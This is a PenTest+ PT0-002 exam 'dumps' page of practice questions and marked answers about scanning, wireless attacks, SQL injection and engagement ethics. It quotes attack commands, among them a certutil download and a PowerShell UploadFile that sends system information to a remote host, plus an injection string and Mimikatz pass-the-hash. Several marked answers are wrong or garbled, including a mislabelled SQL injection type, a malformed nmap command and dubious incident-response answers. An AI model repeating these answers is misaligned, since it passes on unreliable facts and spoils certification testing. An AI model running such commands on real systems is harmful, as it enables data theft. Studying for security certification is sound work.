CompTIA PenTest+ PT0-002 Exam Preparation

Questions and Answers

Which vulnerability allows a tester to obtain credentials by querying a cloud provider's metadata?

Server-side request forgery (correct)

Local file inclusion

Remote file inclusion

Cross-site request forgery

What command can a penetration tester use to download a file from a remote server to assist in exploring service permissions?

wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

schtasks /query /fo LIST /v | find /I “Next Run Time:”

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’, ‘systeminfo.txt’)

certutil –urlcache –split –f http://192.168.2.124/windows-binaries/accesschk64.exe (correct)

Which command would a penetration tester use to perform a ping scan on a subnet?

nmap -sn 10.12.1.0/24 (correct)

nmap -sV -A 10.12.1.0/24

nmap -Pn 10.12.1.0/24

nmap -sT -p- 10.12.1.0/24

What is the most effective recommendation to secure a wireless network after an unauthorized access event using Aircrack-ng?

Changing to Wi-Fi equipment that supports strong encryption

Which benefit does the command 'schtasks /query /fo LIST /v | find /I “Next Run Time:”' provide when exploring service permissions?

Lists all scheduled tasks and their next run times

What aspect of testing does server-side request forgery highlight when accessing cloud provider metadata?

Obtaining sensitive environment data

What is the best method for a penetration tester to pivot and gain additional access to a network when faced with restrictive ACLs on a wireless subnet?

Span deauthentication packets to the wireless clients.

Which approach is NOT recommended to enhance wireless security?

Using WEP encryption

What likely caused all 65,535 ports to be reported as filtered during a second Nmap scan?

A firewall or IPS blocked the scan.

Which tool provides an exploitation suite with payload modules covering the broadest range of target system types?

Metasploit

What impact does using 'nmap -sV -A 10.12.1.0/24' have when assessing a network?

It provides versioning and OS detection for services running on hosts

Which tool combination would be most effective for preparing an attack after discovering a PHP script in a vulnerable state?

Burp Suite and DIRB

What does the -F option in an Nmap scan refer to?

Fast scan that checks only common ports.

If a penetration tester finds a PHP script in an unprotected internal repository, what should be the primary concern?

The script may contain security vulnerabilities.

Which of the following responses is NOT a potential countermeasure a firewall might perform during a network scan?

Automatically updating signature definitions.

In the context of penetration testing, what is an 'evil twin' attack?

A technique of impersonating a legitimate access point.

After discovering a vulnerability and failing to report it, what is the appropriate next step for the company?

Investigate the penetration tester

What should a company verify first when it wants to test the security of its hosted data after obtaining permission from a cloud service provider?

Whether sensitive client data is publicly accessible

What is an example of a Bluesnarfing attack that a penetration tester could perform?

Dump the user address book on the device

Why is it critical for companies to thoroughly investigate after a breach has occurred?

To determine the cause and prevent future incidents

Which of the following is NOT a recommended action after notifying a client about a data breach?

Increase marketing efforts to regain client trust

What outcomes can a poorly executed penetration test lead to?

Unauthorized access to sensitive data

What action should be prioritized to ensure client data is protected in a cloud environment?

Strict access controls

What is the primary goal of conducting a vulnerability scan?

To identify potential security weaknesses

Which of the following actions would be considered unethical according to the SOW? (Select two)

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team

What is the most likely reason for receiving TCP resets during the assessment of web servers?

The web server is using a Web Application Firewall (WAF)

What should a penetration tester do with client findings after an engagement according to the SOW?

Dispose of findings by erasing them in a secure manner

Which behavior aligns with ethical standards when working with a client’s confidential information?

Encrypting findings before delivering them to the client

In the context of the SOW, which of the following actions could be potentially harmful to the client's security?

Disregarding security protocols of the engagement

When a WAF resets a TCP connection, what is it likely responding to?

Malformed packets or suspected attacks

What is a primary responsibility of a penetration tester concerning client confidentiality?

Maintaining confidentiality of sensitive information regarding the client

Which practice could lead to ethical violations in penetration testing?

Failing to report critical vulnerabilities to the client

Which tool is the penetration tester MOST likely to use for performing a vulnerability scan against a web server?

Nikto

What type of SQL injection attack is indicated by the input '1;SELECT Username, Password FROM Users;'?

Error-based

Based on Nmap scan results, which operating system is the target MOST likely running if the scan points to Windows features?

Windows Server

Which Nmap command correctly scans for UDP services SNMP, NetBIOS, and DNS?

nmap –vv sUV –p 53,137-139,161-162 10.10.1.20/24 –oA udpscan

What should a company do NEXT if security alarms are triggered during a penetration test?

Contact law enforcement.

Which scenario BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

The IP address is on the blocklist.

In which scenario would a penetration tester most likely use Nmap?

To perform a network discovery.

Which of the following correctly represents a limitation of penetration testing?

It can only evaluate known vulnerabilities.

What is the primary reason for TCP resets from a web server when a WAF is present?

The WAF is blocking legitimate traffic.

Which recommendation should a penetration tester make to address the use of vulnerable third-party modules in products?

Add a dependency checker into the tool chain.

What change is necessary for fixing the Perl script used to identify vulnerabilities in network switches?

Remove unnecessary variables and streamline the code.

Which tool should be used to pass the hash once password hashes are extracted from lsass.exe?

Mimikatz

What is the most effective way to ensure the security of API settings before a deployment?

Implement strict validation protocols.

What tool is recommended for achieving persistence after passing the hash?

WMI

Which option describes a common outcome when a penetration tester uses a dependency checker during the software development process?

Detecting and addressing known vulnerabilities in libraries.

What is a critical step to ensure the Perl script runs properly?

Modifying specific lines to correct initialization.

Study Notes

CompTIA PenTest+ PT0-002 Dumps

• CertLeader provides 100% valid and up-to-date practice questions and answers for the CompTIA PenTest+ certification exam (PT0-002).
• The dumps contain 253 questions and answers.
• The website provides links to access the practice materials.
• The dumps cover the CompTIA PenTest+ certification exam.

Description

Get ready for your CompTIA PenTest+ PT0-002 exam with our comprehensive practice questions and answers. This quiz includes 253 valid and up-to-date questions, designed to help you succeed in your certification goals. Access the best preparatory materials to boost your confidence and performance on exam day.